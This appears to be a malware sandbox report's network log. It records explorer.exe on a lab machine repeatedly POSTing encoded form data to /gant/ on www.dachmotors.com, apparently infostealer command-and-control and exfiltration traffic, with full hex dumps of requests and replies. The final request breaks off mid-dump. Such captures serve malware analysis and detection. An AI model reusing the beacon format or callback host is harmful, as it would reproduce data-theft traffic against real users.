                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  47192.168.11.2049900198.251.81.24780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:28.207278013 CET1177OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.dachmotors.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.dachmotors.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.dachmotors.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 4d 32 42 74 47 2d 47 62 65 6d 42 44 4e 71 6e 46 31 4e 6a 54 78 37 45 76 75 4e 4d 46 72 2d 7e 79 4e 4d 65 5a 32 52 78 35 74 64 56 34 66 78 57 62 6f 64 56 36 76 58 30 5f 71 45 7e 4a 52 4c 35 35 43 36 68 45 49 31 52 65 56 4a 70 73 70 6f 36 72 58 70 6d 69 4d 64 36 5f 48 7a 31 34 50 4f 28 65 4d 66 6e 4d 68 57 64 50 56 48 4f 62 4f 57 65 56 31 78 67 71 57 64 70 73 35 55 50 50 44 2d 69 51 32 72 37 73 41 74 75 52 67 79 46 44 32 35 37 49 4d 53 49 69 43 43 46 43 63 70 67 45 6b 6c 54 63 66 67 56 59 4b 4a 6a 4c 71 74 30 51 59 79 4b 51 50 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=M2BtG-GbemBDNqnF1NjTx7EvuNMFr-~yNMeZ2Rx5tdV4fxWbodV6vX0_qE~JRL55C6hEI1ReVJpspo6rXpmiMd6_Hz14PO(eMfnMhWdPVHObOWeV1xgqWdps5UPPD-iQ2r7sAtuRgyFD257IMSIiCCFCcpgEklTcfgVYKJjLqt0QYyKQPw).
                                                                                                                  Feb 13, 2023 19:04:28.669085979 CET1179INHTTP/1.1 404 Not Found
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.0.27
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  link: <https://dachmotors.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                  transfer-encoding: chunked
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:04:28 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 63 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 73 db b6 12 7e ae 7f 05 cc cc b1 c9 16 a4 48 4a 94 64 3a 74 a6 4d d3 a7 f6 f4 4c 2f 4f 71 e6 0c 44 ae 28 24 14 c9 02 90 64 1f d5 ff fd 0c 40 4a bc 88 ba 58 4a 3d 13 47 04 76 bf 6f b1 bb 58 e2 22 bf bd 8e b2 50 3c e7 80 66 62 9e 3c 5c bd 95 ff a1 84 a4 71 a0 41 6a fe f9 bb 26 db 80 44 0f 57 df bc 9d 83 20 28 9c 11 c6 41 04 da 9f 7f fc 64 8e b5 87 ab 6f ca 8e 94 cc 21 d0 96 14 56 79 c6 84 86 c2 2c 15 90 8a 40 5b d1 48 cc 82 08 96 34 04 53 3d 60 44 53 2a 28 49 4c 1e 92 04 02 47 c2 bc 4d 68 fa 05 31 48 02 2d 67 d9 94 26 a0 a1 19 83 69 a0 cd 84 c8 b9 df eb c5 f3 3c b6 32 16 f7 9e a6 69 cf 29 94 04 15 09 3c fc 87 c4 80 d2 4c a0 69 b6 48 23 74 f3 66 ec 3a ce 3d fa e5 19 fd 90 64 f1 db 5e 21 75 55 8c 40 19 7a cb b2 49 26 f8 ed d6 cc db 39 79 32 e9 9c c4 60 e6 0c e4 30 fc 84 b0 18 6e 51 ef e1 aa b2 ed 36 4a b9 14 98 82 08 67 b7 85 81 b7 bd 5e 44 c2 d9 3c 13 19 e3 56 98 cd 5b 3a 1a 49 04 b0 94 08 d0 90 f4 75 a0 91 3c 4f 68 48 04 cd d2 1e e3 fc bb a7 79 a2 21 65 64 a0 95 46 a3 1b 46 fe 5a 64 f7 e8 27 80 a8 ed 89 26 5d 6f 0a 10 f5 b4 a6 a1 97 91 be cf e6 73 48 05 3f 85 3d 2c 65 eb 66 f0 90 d1 5c 3c 5c ad 68 1a 65 2b eb bf ab 1c e6 d9 67 fa 3b 08 41 d3 98 a3 00 ad b5 09 e1 f0 27 4b 34 bf 0c f0 63 ef b1 c7 ad 95 8c f0 63 4f 45 82 3f f6 c2 8c c1 63 4f 29 3f f6 9c 81 65 5b f6 63 6f e4 3e 8d dc c7 9e 86 35 78 12 9a af 59 79 1a 6b 58 e3 cb f8 3c 3c be 8c 15 1a 5f c6 1f 0a 40 be 54 80 d9 82 85 a0 f9 6b 2d cc d2 90 08 65 46 69 af 2f cd 6d c6 e1 b1 b7 ca 4d 9a 86 c9 22 02 fe d8 fb cc 55 83 52 32 19 24 40 38 58 73 9a 5a 9f f9 bb 25 b0 60 68 39 96 a3 bd bc dc 5f f5 be bd 46 7f cc 28 47 32 eb 11 e5 88 2c 44 66 c6 90 02 23 02 22 f4 6d ef ea 7a ba 48 43 99 2f 3a 60 82 85 b1 5e 12 86 52 cc 70 86 69 40 ac 90 01 11 f0 21 01 19 35 5d 0b 49 ba 24 5c 33 70 1e 50 2b 06 f1 5e ce c5 27 71 73 53 7f d2 35 37 d2 8c fb 0d 30 e2 3a 6c 80 49 f0 bb 60 34 8d ad 29 cb e6 ef 67 84 bd cf 22 c0 10 e8 b9 15 26 40 d8 6f 10 0a dd c6 36 a6 56 31 a1 a9 35 03 1a cf 84 81 73 6b 4a 93 e4 0f 78 12 3a b1 64 9e 3f eb 62 46 39 06 03 db d8 36 30 b5 44 f6 23 11 e4 cf df 7e d6 0d e3 9e 81 58 b0 14 9d 8f 2b 4a 5c 08 82 a0 81 fd b2 1d 58 a8 43 e1 2f b1 eb a9 22 51 35 e3 5e 58 9c 85 01 60 61 45 30 05 16 08 ab 98 aa d2 6f bd cf 64 49 4a 49 4c a4 43 4b 4f f3 1f 9e ff 20 f1 bf c9 1c 74 4d 56 49 cd f8 68 7f 92 a3 86 34 7a 3f a3 49 a4 0b e3 65 9a 31 3d 0b be 67 8c 3c eb da 34 21 32 b3 8a 4c 32 b0 b0 f8 22 97 f5 92 07 6b 58 02 7b 16 33 9a c6 fe b5 8d ab a7 0f 4f 21 e4 e2 a7 84 c8 f6 17 cc 02 fb 9e bd cd ac 04 d2 58 cc ee d9 77 df 19 15 ca c7 ec 23 fb f4 29 d8 0c 5d 0e 9c 4e f5 fc e6 a6 0a 8b c1 57 54 84 33 3d b7 e4 d0 7e
                                                                                                                  Data Ascii: cbc[[s~HJd:tML/OqD($d@JXJ=GvoX"P<fb<\qAj&DW (Ado!Vy,@[H4S=`DS*(ILGMh1H-g&i<2i)<LiH#tf:=d^!uU@zI&9y2`0nQ6Jg^D<V[:Iu<OhHy!edFFZd'&]osH?=,ef\<\he+g;A'K4ccOE?cO)?e[co>5xYykX<<_@Tk-eFi/mM"UR2$@8XsZ%`h9_F(G2,Df#"mzHC/:`^Rpi@!5]I$\3pP+^'qsS570:lI`4)g"&@o6V15skJx:d?bF960D#~X+J\XC/"Q5^X`aE0odIJILCKO tMVIh4z?Ie1=g<4!2L2"kX{3O!Xw#)]NWT3=~
                                                                                                                  Feb 13, 2023 19:04:28.669133902 CET1180INData Raw: 20 1c 12 9a 42 a0 89 2c d7 64 f4 32 59 b3 87 b6 8d fa 6e fe 84 be 67 94 24 1a 06 63 1d 12 0e 85 f9 7e 19 34 ae 7f 74 dc d1 dd 78 84 87 9e dd bf c3 63 d7 f6 f0 dd f8 ce 2b 9e 3f e1 9d ee 7e bd db 78 77 ed f8 d7 5c ff e8 79 7d 6f 88 bd e1 d8 1d e2
                                                                                                                  Data Ascii: B,d2Yng$c~4txc+?~xw\y}ogn]6nnj~q~-vubV/o6NKo6`W.kLb9>FXz+|EtH7Eye2-zsS5<vsW5*oq]5q&u(
                                                                                                                  Feb 13, 2023 19:04:28.669172049 CET1181INData Raw: ee d1 34 9a d3 28 95 e5 f0 30 07 56 5b a9 2d fe c0 c6 8e 33 c4 ae b7 27 7a d1 22 13 59 0a a6 19 11 f6 45 bd ce d5 09 a7 8f 16 2c d1 6f df ac 72 73 23 d1 14 b8 6d d7 ec 8d d8 41 0c b9 5c 50 f8 fb d5 8b 09 62 3e 43 92 c8 c5 eb 8e 19 8d fe fd 30 93
                                                                                                                  Data Ascii: 4(0V[-3'z"YE,ors#mA\Pb>C0dBaa_2!dm%zwY!ULN$I|&$,!)uDY1ilk0`0o+sw@bhC"#G}?>2}YP
                                                                                                                  Feb 13, 2023 19:04:28.675205946 CET1181INData Raw: c0 21 a4 89 84 8f 4e 6e 88 c7 38 18 70 94 fb 8b d0 14 38 ca 9b 9e 0f 25 55 51 35 c6 eb 9e 27 5f ee c9 26 74 02 49 1e 55 43 8d 6e 27 f7 4b 76 3b 39 86 5e f5 61 8e 41 15 2a 20 24 53 b0 1a 83 0a 66 a2 7a 3d c2 59 33 cc 78 8c 4d 9a 39 d3 38 68 20 4f
                                                                                                                  Data Ascii: !Nn8p8%UQ5'_&tIUCn'Kv;9^aA* $Sfz=Y3xM98h O6};Z%PL%WT%o;vc~f%7T^B8.N~Y^}q>Wp>uBS} fmtjOFgBAk7UE%>
                                                                                                                  Feb 13, 2023 19:04:28.675338984 CET1183INData Raw: 36 33 34 0d 0a ec 5c 5d 6f db 36 14 7d 4e 7e 05 a1 a2 ed c3 a0 4f 4b 96 95 c8 2e da 6c cb fa 50 60 48 ba ed 59 b1 68 9b 89 2c 6a a4 1c 27 ff 7e b8 97 a4 4c b9 89 9b 04 35 50 cc f1 8b e5 2b 7e 5c 91 47 94 cc 7b ce b5 04 18 8a 81 b5 a1 ab 2d 20 b4
                                                                                                                  Data Ascii: 634\]o6}N~OK.lP`HYh,j'~L5P+~\G{- iI0I#L[M<@V=|CVj&yrVsVKk/D`bZy0ugyjk{Dg|iq%9)p++2$=UhJ`x>% Ao
                                                                                                                  Feb 13, 2023 19:04:28.677409887 CET1183INData Raw: 61 0d 0a 03 00 80 74 0a 34 03 56 00 00 0d 0a
                                                                                                                  Data Ascii: at4V
                                                                                                                  Feb 13, 2023 19:04:28.677431107 CET1183INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  48192.168.11.2049901198.251.81.24780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:30.913167000 CET1184OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.dachmotors.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.dachmotors.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.dachmotors.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 4d 32 42 74 47 2d 47 62 65 6d 42 44 4d 4a 50 46 35 4f 62 54 6d 4c 45 73 33 39 4d 46 7e 4f 7e 75 4e 4d 53 5a 32 56 6f 68 71 76 78 34 66 54 7e 62 70 63 56 36 71 58 30 5f 28 30 7e 49 4f 62 34 37 43 36 38 6b 49 31 74 65 56 4a 39 73 72 61 79 72 53 5a 6d 6c 48 39 36 38 50 54 31 35 43 75 28 75 4d 66 71 74 68 58 35 50 57 78 36 62 50 51 79 56 78 6a 45 72 64 64 70 75 75 45 50 41 5a 4f 69 6b 32 71 47 52 41 73 57 42 67 44 78 44 32 5a 62 49 4e 53 49 68 49 79 45 4b 58 4a 67 57 73 6c 36 4e 61 53 73 69 53 49 28 51 6e 63 74 67 4e 48 6a 75 61 39 69 6d 57 79 49 36 4c 66 4f 71 75 4b 7e 44 33 7a 48 4a 4b 76 56 46 70 48 49 2d 69 52 72 76 35 6a 4f 68 7a 54 6c 68 7e 37 47 54 38 7a 4a 73 63 32 6c 2d 4b 37 32 33 4f 31 31 69 57 6b 76 77 45 53 35 6f 61 32 51 33 4a 39 59 6f 66 6c 64 59 35 34 6d 62 45 42 34 62 76 69 35 4c 76 37 72 32 35 42 6f 46 65 43 28 4f 54 64 59 36 34 4a 57 30 4e 43 46 39 7e 53 7e 2d 39 57 57 64 55 46 52 43 44 62 67 38 59 71 4b 6c 73 6e 32 62 47 4f 75 52 79 4a 76 61 32 75 59 35 65 46 4a 62 54 32 38 30 41 70 39 6c 75 46 4d 31 4a 45 46 6e 4a 65 66 63 4f 57 69 64 65 2d 67 66 64 45 79 66 70 50 72 6d 47 78 38 4a 53 74 32 72 63 4b 39 43 57 38 4e 33 53 48 68 4c 31 66 4c 66 43 6b 54 35 36 55 41 42 42 57 49 4d 70 75 38 48 4b 44 72 71 6e 5f 46 36 41 4b 6b 52 47 34 64 30 58 70 51 51 6b 56 73 72 75 37 39 5a 6f 50 6f 53 65 7a 56 35 52 79 72 5f 70 75 32 44 76 73 28 74 55 4c 77 44 36 33 79 56 65 32 69 6c 44 32 7e 78 44 42 69 4d 6a 6c 30 39 54 39 4f 70 34 4f 73 45 71 64 37 52 32 5f 41 61 42 77 46 6b 7e 36 50 31 42 58 47 59 45 72 66 42 7e 50 67 71 41 2d 6f 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=M2BtG-GbemBDMJPF5ObTmLEs39MF~O~uNMSZ2Vohqvx4fT~bpcV6qX0_(0~IOb47C68kI1teVJ9srayrSZmlH968PT15Cu(uMfqthX5PWx6bPQyVxjErddpuuEPAZOik2qGRAsWBgDxD2ZbINSIhIyEKXJgWsl6NaSsiSI(QnctgNHjua9imWyI6LfOquK~D3zHJKvVFpHI-iRrv5jOhzTlh~7GT8zJsc2l-K723O11iWkvwES5oa2Q3J9YofldY54mbEB4bvi5Lv7r25BoFeC(OTdY64JW0NCF9~S~-9WWdUFRCDbg8YqKlsn2bGOuRyJva2uY5eFJbT280Ap9luFM1JEFnJefcOWide-gfdEyfpPrmGx8JSt2rcK9CW8N3SHhL1fLfCkT56UABBWIMpu8HKDrqn_F6AKkRG4d0XpQQkVsru79ZoPoSezV5Ryr_pu2Dvs(tULwD63yVe2ilD2~xDBiMjl09T9Op4OsEqd7R2_AaBwFk~6P1BXGYErfB~PgqA-o.
                                                                                                                  Feb 13, 2023 19:04:31.310998917 CET1186INHTTP/1.1 404 Not Found
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.0.27
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  link: <https://dachmotors.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                  transfer-encoding: chunked
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:04:31 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 63 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 73 db b6 12 7e ae 7f 05 cc cc b1 c9 16 a4 48 4a 94 64 3a 74 a6 4d d3 a7 f6 f4 4c 2f 4f 71 e6 0c 44 ae 28 24 14 c9 02 90 64 1f d5 ff fd 0c 40 4a bc 88 ba 58 4a 3d 13 47 04 76 bf 6f b1 bb 58 e2 22 bf bd 8e b2 50 3c e7 80 66 62 9e 3c 5c bd 95 ff a1 84 a4 71 a0 41 6a fe f9 bb 26 db 80 44 0f 57 df bc 9d 83 20 28 9c 11 c6 41 04 da 9f 7f fc 64 8e b5 87 ab 6f ca 8e 94 cc 21 d0 96 14 56 79 c6 84 86 c2 2c 15 90 8a 40 5b d1 48 cc 82 08 96 34 04 53 3d 60 44 53 2a 28 49 4c 1e 92 04 02 47 c2 bc 4d 68 fa 05 31 48 02 2d 67 d9 94 26 a0 a1 19 83 69 a0 cd 84 c8 b9 df eb c5 f3 3c b6 32 16 f7 9e a6 69 cf 29 94 04 15 09 3c fc 87 c4 80 d2 4c a0 69 b6 48 23 74 f3 66 ec 3a ce 3d fa e5 19 fd 90 64 f1 db 5e 21 75 55 8c 40 19 7a cb b2 49 26 f8 ed d6 cc db 39 79 32 e9 9c c4 60 e6 0c e4 30 fc 84 b0 18 6e 51 ef e1 aa b2 ed 36 4a b9 14 98 82 08 67 b7 85 81 b7 bd 5e 44 c2 d9 3c 13 19 e3 56 98 cd 5b 3a 1a 49 04 b0 94 08 d0 90 f4 75 a0 91 3c 4f 68 48 04 cd d2 1e e3 fc bb a7 79 a2 21 65 64 a0 95 46 a3 1b 46 fe 5a 64 f7 e8 27 80 a8 ed 89 26 5d 6f 0a 10 f5 b4 a6 a1 97 91 be cf e6 73 48 05 3f 85 3d 2c 65 eb 66 f0 90 d1 5c 3c 5c ad 68 1a 65 2b eb bf ab 1c e6 d9 67 fa 3b 08 41 d3 98 a3 00 ad b5 09 e1 f0 27 4b 34 bf 0c f0 63 ef b1 c7 ad 95 8c f0 63 4f 45 82 3f f6 c2 8c c1 63 4f 29 3f f6 9c 81 65 5b f6 63 6f e4 3e 8d dc c7 9e 86 35 78 12 9a af 59 79 1a 6b 58 e3 cb f8 3c 3c be 8c 15 1a 5f c6 1f 0a 40 be 54 80 d9 82 85 a0 f9 6b 2d cc d2 90 08 65 46 69 af 2f cd 6d c6 e1 b1 b7 ca 4d 9a 86 c9 22 02 fe d8 fb cc 55 83 52 32 19 24 40 38 58 73 9a 5a 9f f9 bb 25 b0 60 68 39 96 a3 bd bc dc 5f f5 be bd 46 7f cc 28 47 32 eb 11 e5 88 2c 44 66 c6 90 02 23 02 22 f4 6d ef ea 7a ba 48 43 99 2f 3a 60 82 85 b1 5e 12 86 52 cc 70 86 69 40 ac 90 01 11 f0 21 01 19 35 5d 0b 49 ba 24 5c 33 70 1e 50 2b 06 f1 5e ce c5 27 71 73 53 7f d2 35 37 d2 8c fb 0d 30 e2 3a 6c 80 49 f0 bb 60 34 8d ad 29 cb e6 ef 67 84 bd cf 22 c0 10 e8 b9 15 26 40 d8 6f 10 0a dd c6 36 a6 56 31 a1 a9 35 03 1a cf 84 81 73 6b 4a 93 e4 0f 78 12 3a b1 64 9e 3f eb 62 46 39 06 03 db d8 36 30 b5 44 f6 23 11 e4 cf df 7e d6 0d e3 9e 81 58 b0 14 9d 8f 2b 4a 5c 08 82 a0 81 fd b2 1d 58 a8 43 e1 2f b1 eb a9 22 51 35 e3 5e 58 9c 85 01 60 61 45 30 05 16 08 ab 98 aa d2 6f bd cf 64 49 4a 49 4c a4 43 4b 4f f3 1f 9e ff 20 f1 bf c9 1c 74 4d 56 49 cd f8 68 7f 92 a3 86 34 7a 3f a3 49 a4 0b e3 65 9a 31 3d 0b be 67 8c 3c eb da 34 21 32 b3 8a 4c 32 b0 b0 f8 22 97 f5 92 07 6b 58 02 7b 16 33 9a c6 fe b5 8d ab a7 0f 4f 21 e4 e2 a7 84 c8 f6 17 cc 02 fb 9e bd cd ac 04 d2 58 cc ee d9 77 df 19 15 ca c7 ec 23 fb f4 29 d8 0c 5d 0e 9c 4e f5 fc e6 a6 0a 8b c1 57 54 84 33 3d b7 e4 d0 7e
                                                                                                                  Data Ascii: cbc[[s~HJd:tML/OqD($d@JXJ=GvoX"P<fb<\qAj&DW (Ado!Vy,@[H4S=`DS*(ILGMh1H-g&i<2i)<LiH#tf:=d^!uU@zI&9y2`0nQ6Jg^D<V[:Iu<OhHy!edFFZd'&]osH?=,ef\<\he+g;A'K4ccOE?cO)?e[co>5xYykX<<_@Tk-eFi/mM"UR2$@8XsZ%`h9_F(G2,Df#"mzHC/:`^Rpi@!5]I$\3pP+^'qsS570:lI`4)g"&@o6V15skJx:d?bF960D#~X+J\XC/"Q5^X`aE0odIJILCKO tMVIh4z?Ie1=g<4!2L2"kX{3O!Xw#)]NWT3=~
                                                                                                                  Feb 13, 2023 19:04:31.311081886 CET1187INData Raw: 20 1c 12 9a 42 a0 89 2c d7 64 f4 32 59 b3 87 b6 8d fa 6e fe 84 be 67 94 24 1a 06 63 1d 12 0e 85 f9 7e 19 34 ae 7f 74 dc d1 dd 78 84 87 9e dd bf c3 63 d7 f6 f0 dd f8 ce 2b 9e 3f e1 9d ee 7e bd db 78 77 ed f8 d7 5c ff e8 79 7d 6f 88 bd e1 d8 1d e2
                                                                                                                  Data Ascii: B,d2Yng$c~4txc+?~xw\y}ogn]6nnj~q~-vubV/o6NKo6`W.kLb9>FXz+|EtH7Eye2-zsS5<vsW5*oq]5q&u(
                                                                                                                  Feb 13, 2023 19:04:31.311137915 CET1188INData Raw: ee d1 34 9a d3 28 95 e5 f0 30 07 56 5b a9 2d fe c0 c6 8e 33 c4 ae b7 27 7a d1 22 13 59 0a a6 19 11 f6 45 bd ce d5 09 a7 8f 16 2c d1 6f df ac 72 73 23 d1 14 b8 6d d7 ec 8d d8 41 0c b9 5c 50 f8 fb d5 8b 09 62 3e 43 92 c8 c5 eb 8e 19 8d fe fd 30 93
                                                                                                                  Data Ascii: 4(0V[-3'z"YE,ors#mA\Pb>C0dBaa_2!dm%zwY!ULN$I|&$,!)uDY1ilk0`0o+sw@bhC"#G}?>2}YP
                                                                                                                  Feb 13, 2023 19:04:31.314685106 CET1190INData Raw: 36 33 34 0d 0a ec 5c 5d 6f db 36 14 7d 4e 7e 05 a1 a2 ed c3 a0 4f 4b 96 95 c8 2e da 6c cb fa 50 60 48 ba ed 59 b1 68 9b 89 2c 6a a4 1c 27 ff 7e b8 97 a4 4c b9 89 9b 04 35 50 cc f1 8b e5 2b 7e 5c 91 47 94 cc 7b ce b5 04 18 8a 81 b5 a1 ab 2d 20 b4
                                                                                                                  Data Ascii: 634\]o6}N~OK.lP`HYh,j'~L5P+~\G{- iI0I#L[M<@V=|CVj&yrVsVKk/D`bZy0ugyjk{Dg|iq%9)p++2$=UhJ`x>% Ao
                                                                                                                  Feb 13, 2023 19:04:31.314755917 CET1190INData Raw: c0 21 a4 89 84 8f 4e 6e 88 c7 38 18 70 94 fb 8b d0 14 38 ca 9b 9e 0f 25 55 51 35 c6 eb 9e 27 5f ee c9 26 74 02 49 1e 55 43 8d 6e 27 f7 4b 76 3b 39 86 5e f5 61 8e 41 15 2a 20 24 53 b0 1a 83 0a 66 a2 7a 3d c2 59 33 cc 78 8c 4d 9a 39 d3 38 68 20 4f
                                                                                                                  Data Ascii: !Nn8p8%UQ5'_&tIUCn'Kv;9^aA* $Sfz=Y3xM98h O6};Z%PL%WT%o;vc~f%7T^B8.N~Y^}q>Wp>uBS} fmtjOFgBAk7UE%>
                                                                                                                  Feb 13, 2023 19:04:31.316432953 CET1190INData Raw: 61 0d 0a 03 00 80 74 0a 34 03 56 00 00 0d 0a
                                                                                                                  Data Ascii: at4V
                                                                                                                  Feb 13, 2023 19:04:31.316505909 CET1190INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  49192.168.11.2049902198.251.81.24780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:33.689393997 CET1201OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.dachmotors.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.dachmotors.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.dachmotors.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 4d 32 42 74 47 2d 47 62 65 6d 42 44 4d 4a 50 46 35 4f 62 54 6d 4c 45 73 33 39 4d 46 7e 4f 7e 75 4e 4d 53 5a 32 56 6f 68 71 76 35 34 65 69 65 62 6d 62 68 36 70 58 30 5f 6a 6b 7e 4e 4f 62 35 6a 43 36 30 6f 49 31 68 6f 56 4c 46 73 72 4a 4b 72 56 72 7e 6c 43 39 36 48 54 44 31 37 50 4f 28 36 4d 66 6d 35 68 58 64 66 56 42 6d 62 4f 58 4f 56 31 53 45 71 65 4e 70 73 75 45 50 45 4f 65 69 73 32 71 44 4f 41 73 71 42 67 42 31 44 32 76 66 49 42 68 67 68 46 43 45 4c 65 70 67 54 31 31 36 34 61 54 4a 54 53 49 28 71 6e 5a 4e 67 4e 42 6a 75 62 37 71 6e 56 53 49 36 42 5f 4f 70 71 4b 79 48 33 7a 62 42 4b 73 4a 46 70 45 34 2d 6a 78 72 76 38 48 53 75 30 7a 6b 6b 76 72 47 49 72 6a 4e 30 63 33 41 50 4b 36 69 33 4f 46 68 69 57 54 37 77 48 32 74 6f 55 32 51 35 55 4e 59 37 57 46 63 63 35 37 4f 70 45 41 5a 75 76 6c 70 4c 75 61 4c 32 76 51 6f 47 61 69 28 49 57 64 5a 67 38 4a 72 31 4e 43 30 73 7e 53 7e 55 39 58 69 64 55 31 42 43 43 61 67 5f 5a 61 4c 4d 6d 33 32 4b 50 76 53 68 79 4a 7a 53 32 74 4a 6b 65 43 52 62 52 57 38 30 46 4f 52 6d 6d 31 4d 32 57 55 45 69 4e 65 66 4c 4f 57 66 32 65 5f 6b 6c 65 31 65 66 76 5f 37 6d 58 52 38 4b 45 64 32 76 57 71 39 49 64 63 4e 33 53 48 6c 35 31 66 33 66 44 57 44 35 37 6d 6f 42 46 46 51 4d 75 65 38 4e 4b 44 72 37 6e 5f 59 61 41 4b 73 4f 47 35 74 61 58 72 63 51 6c 41 49 72 76 4a 46 61 69 66 70 35 61 7a 56 55 66 53 32 67 70 71 76 4f 76 76 58 39 55 38 41 44 37 33 69 56 61 32 69 69 54 47 7e 49 45 42 69 61 6e 6c 6f 68 54 39 54 65 34 4f 6f 55 71 66 4c 52 30 61 78 65 64 69 46 69 69 5a 66 4f 5a 77 4f 76 46 36 76 43 6b 66 77 4f 65 70 67 37 75 4c 56 66 7a 65 6c 4f 4b 39 52 6b 59 58 4a 65 50 79 6d 64 34 74 32 43 30 37 55 6e 38 32 57 6c 43 6d 53 4c 5a 7a 64 39 42 48 28 46 48 66 4f 38 33 6d 55 4d 55 65 4c 45 71 35 7a 61 6c 58 58 65 58 79 75 64 54 65 72 5f 62 52 33 78 51 59 77 31 57 44 6a 6c 42 50 4d 63 53 33 4c 71 68 65 73 63 59 46 7e 70 70 44 44 66 37 69 4f 6d 4a 62 59 55 33 6f 76 62 66 47 76 4e 61 4f 65 4a 74 53 68 48 35 33 70 47 65 4d 37 41 59 79 49 69 68 79 72 50 31 50 7a 72 57 33 74 43 70 53 28 4b 76 71 4e 38 6b 49 68 49 65 5a 32 57 69 38 78 68 50 57 5a 79 61 70 48 50 6c 6a 43 32 58 37 49 33 55 75 46 73 4f 66 47 77 77 79 50 2d 6e 52 7e 58 51 4e 43 4a 44 39 49 34 59 74 6e 71 6c 7a 43 7a 63 50 75 4a 78 68 6b 4e 46 6c 76 5f 49 6e 61 56 70 6a 5a 71 48 58 7a 75 50 6c 49 45 78 75 49 31 68 45 68 49 62 57 41 69 78 55 44 63 74 4a 37 36 7a 30 37 4b 48 35 54 57 4c 75 57 77 4e 48 71 70 47 4b 39 48 5a 47 4b 35 6f 44 4e 37 66 71 32 41 7a 48 73 77 56 4e 33 45 6a 6c 71 66 6b 6e 28 6a 45 39 31 47 4f 66 4d 6d 55 30 33 56 49 78 73 59 75 50 72 47 73 33 41 6b 61 5f 35 5a 28 62 7a 7a 41 61 6f 34 7e 6b 31 48 50 53 46 4c 28 32 70 72 38 67 31 72 4c 33 62 76 4c 57 30 77 30 42 5a 7a 42 36 73 45 33 33 44 6e 6e 56 44 4a 41 53 51 4f 74 46 28 35 6f 66 4d 44 4a 31 43 34 54 7a 31 7a 6e 42 61 70 47 5f 69 51 55 31 39 4b 45 6d 79 45 44 2d 68 32 6a 41 43 67 53 52 65 30 5a 45 32 71 73 57 36 57 43 31 32 52 54 4c 4b 73 47 65 67 4f 4f 76 7e 7a 78 69 70 6d 6f 6e 58 50 55 64 39 79 28 42 45 78 72 6a 31 32 59 39 58 71 7e 47 4a 53 6c 68 41 74 77 56 64 61 43 47 46 78 51 77 77 79 55 55 31 6c 6b 4e 33 52 70 39 52 58 30 4e 44 43 49 6e 79 76 46 32 6c 67 77 31 38 68 35 53 46 30 57 46 79 6d 64 53 78 73 63 7a 56 59 58 73 49 75 32 42 69 53 59 46 57 42 4c 47 34 64 51 39 78 55 6b 6f 42 53 61 62 5a 68 37 47 54 55 69 58 53 4d 6e 34 44 6d 6b 38 6d 57 36 39 7a 39 49 6c 54 73 47 56 63 65 78 5a 6a 4f 69 2d 4a 62 65 6c 71 39 6f 38 4c 2d 70 6b 63 48 49 30 58 75 71 76 41 57 28 67 46 79 6b 31 73 33 54 6f 50 79 